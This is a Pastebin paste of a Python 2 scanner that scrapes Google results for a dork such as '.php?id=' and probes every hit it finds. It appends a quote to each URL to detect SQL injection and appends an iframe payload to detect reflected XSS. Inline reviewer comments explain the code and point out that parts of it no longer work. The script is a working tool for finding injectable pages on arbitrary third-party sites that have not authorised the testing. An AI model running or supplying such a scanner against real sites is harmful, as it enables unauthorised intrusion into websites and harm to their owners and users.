Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
#! /usr/bin/python2
#encoding:utf-8;
# Google-dork result scanner (Python 2 ONLY: print statements and
# `except Exception, ex` syntax; urllib.quote/unquote were moved to
# urllib.parse in Python 3).
# Fetches Google search results for a term and optionally probes each
# hit for SQL-error signatures, reflected markup, or a user regex.
import urllib,sys,re,requests
from optparse import OptionParser
# ANSI-colored ASCII-art banner: \033[32m = green, \033[31m = red,
# \033[0;0m = reset. The art may render misaligned here because the
# original leading whitespace was lost in the paste.
print '''\033[32m
____ _
/ ___| ___ ___ __ _| | ___
| | _ / _ \ / _ \ / _` | |/ _ \
|=========\033[31m\033[0;0m [\033[31m REVERSE\033[0;0m ]\033[32m ========|
| |_| | (_) | (_) | (_| | | __/
\____|\___/ \___/ \__, |_|\___|
|___/
Google + Proxy
\033[0;0m'''
# Command-line options (help strings are Portuguese in the original and
# are runtime strings, left untouched). Flags: -t search term,
# -s SQLi probe, -x XSS probe, -r regex search, --show list URLs.
# NOTE(review): "--show" is passed twice as both short and long option
# string to add_option; optparse accepts this but it is redundant.
parser = OptionParser()
parser.add_option("-t", "--term", dest="term", default=".php?id=", help="Term to search", metavar="FILE")
parser.add_option("-s", "--sqli", action="store_true", dest="sqli", default=False, help="Scanear por SQL Injection")
parser.add_option("-x", "--xss", action="store_true", dest="xss", default=False, help="Scanear por XSS")
parser.add_option("-r", "--regex", dest="regex", default=False, help="pesquisar expressões regulares em cada página")
parser.add_option("--show", "--show", action="store_true", dest="show", default=False, help="Exibir URLS")
(options, args) = parser.parse_args()
term=options.term
# Request up to 100 Google results for the URL-encoded term in one page.
url="http://www.google.com/search?q=%s&num=100"%urllib.quote(term)
text=requests.get(url).text
# Scrape result links out of the raw HTML. NOTE(review): this pattern
# targets the legacy Google markup <h3 class="r"><a href="/url?q=...&...>
# and captures up to the first '&'; it will find nothing against the
# current Google result page layout.
urls=re.findall("<h3 class=\"r\"><a href=\"/url\?q=(.*?)\&",text)
# Print how many candidate URLs were extracted.
print len (urls)
if options.sqli:
    # For each scraped URL: un-percent-encode it, append a single quote,
    # and grep the response body for database error signatures.
    # NOTE(review): the signature alternation is passed as a regex but is
    # written as literal text — "SELECT * FROM" and the "()" suffixes are
    # unescaped regex metacharacters, and "mysql_fetch_row" contains an
    # invisible zero-width space from the paste — so several alternatives
    # can never match as the author intended.
    for i in urls:
        i= urllib.unquote(i)
        try:
            text=requests.get(i+"'").text
            if re.search ("error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error",text):
                print "\033[32m",i,"\033[0;0m - SQLI"
            else:
                print i,"NO SQLI"
        except Exception, ex:
            # Best-effort scan: network/HTTP errors for a URL are
            # silently skipped rather than aborting the loop.
            pass
if options.xss:
    # Marker payload appended verbatim to each URL; a hit is declared if
    # the exact payload string is reflected unescaped in the response.
    xss="<iframe src=\"http://xss/\" \">"
    for i in urls:
        i= urllib.unquote(i)
        try:
            text=requests.get(i+xss).text
            # Plain substring check — no HTML parsing, so encoded or
            # partially-escaped reflections are not detected.
            if xss in text:
                print "\033[32m",i,"\033[0;0m - XSS"
            else:
                print i,"NO XSS"
        except Exception, ex:
            # Best-effort scan: request failures are silently skipped.
            pass
if options.regex:
    # Fetch every scraped URL and print all matches of the user-supplied
    # regular expression found in its body.
    print ' Using regular expression:'+options.regex+'\n'
    for i in urls:
        try:
            text=requests.get(i).text
            print urllib.unquote(i)+':'
            for r in re.findall(options.regex,text):
                print r
            print ''
        except Exception, ex:
            # Unlike the probe loops above, errors here are reported
            # ("Erro em " = "Error in", Portuguese) instead of swallowed.
            print 'Erro em '+i+str(ex)
# NOTE(review): because this is `elif`, --show is silently ignored
# whenever --regex is also given.
elif options.show:
    # Dump the raw (still percent-encoded) scraped URLs, one per line.
    print '\n'.join(urls)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement